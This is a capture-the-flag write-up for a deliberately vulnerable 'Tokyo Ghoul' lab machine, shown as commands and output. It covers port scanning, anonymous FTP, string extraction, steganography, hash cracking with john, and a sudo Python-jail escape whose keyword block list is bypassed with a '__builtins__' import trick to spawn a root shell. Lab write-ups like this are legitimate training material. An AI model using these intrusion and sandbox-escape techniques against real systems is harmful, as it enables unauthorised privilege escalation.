$ sudo nmap -sSVC tokyoghoul.thm -T4 -p- -v ... PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 3 ftp ftp 4096 Jan 23 2021 need_Help? | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.18.25.199 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA) | 256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA) |_ 256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Welcome To Tokyo goul | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ...
<!-- look don't tell jason but we will help you escape we will give you the key to open those chains and here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there -->
$ ftp tokyoghoul.thm Connected to tokyoghoul.thm. 220 (vsFTPd 3.0.3) Name (tokyoghoul.thm:noraj): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 ftp ftp 4096 Jan 23 2021 need_Help? 226 Directory send OK. ftp> ls need_Help? 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 480 Jan 23 2021 Aogiri_tree.txt drwxr-xr-x 2 ftp ftp 4096 Jan 23 2021 Talk_with_me 226 Directory send OK. ftp> ls need_Help?/Talk_with_me 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxr-xr-x 1 ftp ftp 17488 Jan 23 2021 need_to_talk -rw-r--r-- 1 ftp ftp 46674 Jan 23 2021 rize_and_kaneki.jpg 226 Directory send OK.
The binary is asking for a passphrase, we can find it by viewing the strings.
1 2 3 4 5 6 7 8 9 10 11
$ rabin2 -z files/Talk_with_me/need_to_talk [Strings] nth paddr vaddr len size section type string ――――――――――――――――――――――――――――――――――――――――――――――――――――――― 0 0x00002008 0x00002008 9 10 .rodata ascii EDITED_PASS_HERE 1 0x00002018 0x00002018 37 38 .rodata ascii Hey Kaneki finnaly you want to talk \n 2 0x00002040 0x00002040 82 83 .rodata ascii Unfortunately before I can give you the kagune you need to give me the paraphrase\n 3 0x00002098 0x00002098 35 36 .rodata ascii Do you have what I'm looking for?\n\n 4 0x000020c0 0x000020c0 47 48 .rodata ascii Good job. I believe this is what you came for:\n 5 0x000020f0 0x000020f0 51 52 .rodata ascii Hmm. I don't think this is what I was looking for.\n 6 0x00002128 0x00002128 36 37 .rodata ascii Take a look inside of me. rabin2 -z\n
I guess rize_and_kaneki.jpg may requires some stego.
We can use steghide to
1 2 3
$ steghide extract -sf files/Talk_with_me/rize_and_kaneki.jpg Enter passphrase: wrote extracted data to "yougotme.txt".
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=sha512crypt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status EDITED (?) 1g 0:00:00:01 DONE (2022-11-01 20:37) 0.9803g/s 1505p/s 1505c/s 1505C/s cuties..mexico1 Use the "--show" option to display all of the cracked passwords reliably Session completed
kamishiro@vagrant:~$ cat user.txt EDITED kamishiro@vagrant:~$ sudo -l Matching Defaults entries for kamishiro on vagrant.vm: env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kamishiro may run the following commands on vagrant.vm: (ALL) /usr/bin/python3 /home/kamishiro/jail.py
kamishiro@vagrant:~$ sudo /usr/bin/python3 /home/kamishiro/jail.py Hi! Welcome to my world kaneki ======================================================================== What ? You gonna stand like a chicken ? fight me Kaneki >>> import os Do you think i will let you do this ??????
We can take a look at the source code:
1 2 3
kamishiro@vagrant:~$ ls -lhA jail.py -rw-r--r-- 1 root root 588 Jan 23 2021 jail.py kamishiro@vagrant:~$ cat jail.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
#! /usr/bin/python3 #-*- coding:utf-8 -*- defmain(): print("Hi! Welcome to my world kaneki") print("========================================================================") print("What ? You gonna stand like a chicken ? fight me Kaneki") text = input('>>> ') for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']: if keyword in text: print("Do you think i will let you do this ??????") return; else: exec(text) print('No Kaneki you are so dead') if __name__ == "__main__": main()
kamishiro@vagrant:~$ sudo /usr/bin/python3 /home/kamishiro/jail.py Hi! Welcome to my world kaneki ======================================================================== What ? You gonna stand like a chicken ? fight me Kaneki >>> __builtins__.__dict__['__im' + 'port__']('pty').spawn("/bin/bash") root@vagrant:~# id uid=0(root) gid=0(root) groups=0(root) root@vagrant:~# cat /root/root.txt EDITED